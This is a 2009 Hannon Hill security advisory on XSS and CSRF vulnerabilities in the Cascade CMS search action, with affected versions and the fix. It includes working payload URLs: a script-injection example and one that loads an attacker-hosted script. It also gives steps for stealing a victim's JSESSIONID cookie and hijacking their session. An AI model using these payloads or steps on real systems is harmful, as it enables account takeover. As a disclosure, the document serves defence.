Security Update 6-29-2009
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions
Severity: Moderate
Hannon Hill rates the severity of these vulnerabilities as
Moderate. The vulnerabilities allow an attacker to make victims
execute arbitrary JavaScript, gain access to Cascade, or elevate
his/her privileges; but they require the attacker to manipulate
victims using social engineering tactics. If the attacker already
had Cascade credentials, he/she could embed a malicious link in
frequently visited content to more easily manipulate victims into
navigating to it.
Risk Assessment
The underlying vulnerability is that user input is returned
verbatim in the browser when the search query supplied by the user
is not parsable.
XSS Vulnerability
An attacker without access to Cascade could manipulate victims
using social engineering tactics to execute arbitrary JavaScript
when navigating to the the Cascade search action.
An example link would be:
http://domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Ealert('hacked')%3C/script%3E&mode=basic
An attacker with access to Cascade could embed a link to the
Cascade search action containing arbitrary JavaScript in a
prominent place within Cascade page content to more easily
manipulate victims into navigating to the link.
CSRF Vulnerability
The CSRF vulnerability is an extension of the XSS scripting
vulnerability except that it also requires the attacker to have
access to a server at the same top-level domain as where Cascade is
running. For example, if Cascade is hosted at
cascade.hannonhill.com, the attacker would also need access to a
sub-domain like intranet.hannonhill.com.
The steps to exploit this vulnerability are as follows:
1. Create XSS like:
http://cascade.domain:port/searchsubmit.act?quickQuery=%22%3Cscript%3Edocument.domain=domain.com%3C/script%3E%3Cscript%20src=http://subdomain.domain.com/attacker/x.js%20/%3E&mode=basic
Here we are resetting the document domain for the page to the
very top level domain. This allows the attacker to bypass the Same
Origin browser security policy and security restrictions that would
normally prevent a script from loading from a different server.
2. Social engineer a victim to visit the above XSS link, or if the
attacker already had access to Cascade, embed this link in the
content of a frequently visited page.
3. When the user clicks the link, the malicious script loads and
shuttles victim's document.cookie (which include JSESSIONID) to
offsite server.
4. Attacker visits
https://cascade.domain.com:port/login.act
to have the
system set a valid cookie on the attacker's browser.
5. Attacker replaces his valid JSESSIONID with the one retrieved
via XSS and successfully assumes the identity of the
victim.
Vulnerability
The XSS and CSRF vulnerabilities exists for all Cascade Server
versions prior to Cascade 5.7.5 in the 5 series, prior to 6.0.3 in
the 6 series.
Fix
The fix is for Cascade to properly escape or hide user input when displaying the error message in the search results page.
This issue has been fixed in Cascade 5.7.5, 6.0.3, and later. There are no patch versions available for Cascade versions 5.5.x or earlier. We recommend an upgrade to Cascade 5.7.x or later.